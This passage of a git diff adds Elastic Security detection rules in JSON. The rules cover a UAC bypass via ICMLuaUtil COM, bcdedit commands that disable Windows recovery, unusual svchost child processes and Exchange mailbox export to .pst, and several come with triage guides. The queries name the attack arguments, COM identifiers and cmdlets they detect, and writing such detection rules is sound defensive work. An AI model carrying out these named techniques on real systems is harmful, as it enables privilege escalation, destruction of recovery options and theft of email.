[ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMaskDescription", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Properties", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68ad737b-f90a-4fe5-bda6-a68fa460044e", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: System", + "Data Source: Active Directory", + "Data Source: Windows" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "68ad737b-f90a-4fe5-bda6-a68fa460044e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_108.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_108.json new file mode 100644 index 00000000000..316c3f70108 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_108.json @@ -0,0 +1,144 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via ICMLuaUtil Elevated COM Interface", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"dllhost.exe\" and\n process.parent.args in (\"/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\", \"/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}\") and\n process.pe.original_file_name != \"WerFault.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "68d56fdc-7ffa-4419-8e95-81641bd6f845_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_109.json b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_109.json new file mode 100644 index 00000000000..143019d3fc7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/68d56fdc-7ffa-4419-8e95-81641bd6f845_109.json @@ -0,0 +1,144 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevated COM interface. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass via ICMLuaUtil Elevated COM Interface", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"dllhost.exe\" and\n process.parent.args in (\"/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\", \"/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}\") and\n process.pe.original_file_name != \"WerFault.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "68d56fdc-7ffa-4419-8e95-81641bd6f845", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "68d56fdc-7ffa-4419-8e95-81641bd6f845_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_108.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_108.json new file mode 100644 index 00000000000..d1deb033cbb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_108.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of bcdedit.exe to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of Boot Configuration", + "note": "## Triage and analysis\n\n### Investigating Modification of Boot Configuration\n\nBoot entry parameters, or boot parameters, are optional, system-specific settings that represent configuration options. These are stored in a boot configuration data (BCD) store, and administrators can use utilities like `bcdedit.exe` to configure these.\n\nThis rule identifies the usage of `bcdedit.exe` to:\n\n- Disable Windows Error Recovery (recoveryenabled).\n- Ignore errors if there is a failed boot, failed shutdown, or failed checkpoint (bootstatuspolicy ignoreallfailures).\n\nThese are common steps in destructive attacks by adversaries leveraging ransomware.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- The usage of these options is not inherently malicious. Administrators can modify these configurations to force a machine to boot for troubleshooting or data recovery purposes.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"bcdedit.exe\" or ?process.pe.original_file_name == \"bcdedit.exe\") and\n (\n (process.args : \"/set\" and process.args : \"bootstatuspolicy\" and process.args : \"ignoreallfailures\") or\n (process.args : \"no\" and process.args : \"recoveryenabled\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "69c251fb-a5d6-4035-b5ec-40438bd829ff_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_109.json b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_109.json new file mode 100644 index 00000000000..f6668dd5558 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/69c251fb-a5d6-4035-b5ec-40438bd829ff_109.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of bcdedit.exe to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of Boot Configuration", + "note": "## Triage and analysis\n\n### Investigating Modification of Boot Configuration\n\nBoot entry parameters, or boot parameters, are optional, system-specific settings that represent configuration options. These are stored in a boot configuration data (BCD) store, and administrators can use utilities like `bcdedit.exe` to configure these.\n\nThis rule identifies the usage of `bcdedit.exe` to:\n\n- Disable Windows Error Recovery (recoveryenabled).\n- Ignore errors if there is a failed boot, failed shutdown, or failed checkpoint (bootstatuspolicy ignoreallfailures).\n\nThese are common steps in destructive attacks by adversaries leveraging ransomware.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- The usage of these options is not inherently malicious. Administrators can modify these configurations to force a machine to boot for troubleshooting or data recovery purposes.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"bcdedit.exe\" or ?process.pe.original_file_name == \"bcdedit.exe\") and\n (\n (process.args : \"/set\" and process.args : \"bootstatuspolicy\" and process.args : \"ignoreallfailures\") or\n (process.args : \"no\" and process.args : \"recoveryenabled\")\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "69c251fb-a5d6-4035-b5ec-40438bd829ff_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_109.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_109.json new file mode 100644 index 00000000000..c3ef65eb970 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_109.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation.", + "false_positives": [ + "Changes to Windows services or a rarely executed child process." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Service Host Child Process - Childless Service", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and\n\n /* based on svchost service arguments -s svcname where the service is known to be childless */\n process.parent.args : (\n \"WdiSystemHost\", \"LicenseManager\", \"StorSvc\", \"CDPSvc\", \"cdbhsvc\", \"BthAvctpSvc\", \"SstpSvc\", \"WdiServiceHost\",\n \"imgsvc\", \"TrkWks\", \"WpnService\", \"IKEEXT\", \"PolicyAgent\", \"CryptSvc\", \"netprofm\", \"ProfSvc\", \"StateRepository\",\n \"camsvc\", \"LanmanWorkstation\", \"NlaSvc\", \"EventLog\", \"hidserv\", \"DisplayEnhancementService\", \"ShellHWDetection\",\n \"AppHostSvc\", \"fhsvc\", \"CscService\", \"PushToInstall\"\n ) and\n\n /* unknown FPs can be added here */\n not process.name : (\"WerFault.exe\", \"WerFaultSecure.exe\", \"wermgr.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\RelPost.exe\" and process.parent.args : \"WdiSystemHost\") and\n not (\n process.name : \"rundll32.exe\" and\n process.args : \"?:\\\\WINDOWS\\\\System32\\\\winethc.dll,ForceProxyDetectionOnNextRun\" and\n process.parent.args : \"WdiServiceHost\"\n ) and\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Kodak\\\\kds_?????\\\\lib\\\\lexexe.exe\"\n ) and process.parent.args : \"imgsvc\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_110.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_110.json new file mode 100644 index 00000000000..77e7f6688a5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_110.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation.", + "false_positives": [ + "Changes to Windows services or a rarely executed child process." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Service Host Child Process - Childless Service", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and\n\n /* based on svchost service arguments -s svcname where the service is known to be childless */\n process.parent.args : (\n \"WdiSystemHost\", \"LicenseManager\", \"StorSvc\", \"CDPSvc\", \"cdbhsvc\", \"BthAvctpSvc\", \"SstpSvc\", \"WdiServiceHost\",\n \"imgsvc\", \"TrkWks\", \"WpnService\", \"IKEEXT\", \"PolicyAgent\", \"CryptSvc\", \"netprofm\", \"ProfSvc\", \"StateRepository\",\n \"camsvc\", \"LanmanWorkstation\", \"NlaSvc\", \"EventLog\", \"hidserv\", \"DisplayEnhancementService\", \"ShellHWDetection\",\n \"AppHostSvc\", \"fhsvc\", \"CscService\", \"PushToInstall\"\n ) and\n\n /* unknown FPs can be added here */\n not process.name : (\"WerFault.exe\", \"WerFaultSecure.exe\", \"wermgr.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\RelPost.exe\" and process.parent.args : \"WdiSystemHost\") and\n not (\n process.name : \"rundll32.exe\" and\n process.args : \"?:\\\\WINDOWS\\\\System32\\\\winethc.dll,ForceProxyDetectionOnNextRun\" and\n process.parent.args : \"WdiServiceHost\"\n ) and\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Kodak\\\\kds_?????\\\\lib\\\\lexexe.exe\"\n ) and process.parent.args : \"imgsvc\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_110.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_110.json new file mode 100644 index 00000000000..9742a8a9d15 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_110.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Exporting Exchange Mailbox via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Exporting Exchange Mailbox via PowerShell\n\nEmail mailboxes and their information can be valuable assets for attackers. Company mailboxes often contain sensitive information such as login credentials, intellectual property, financial data, and personal information, making them high-value targets for malicious actors.\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\n\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - 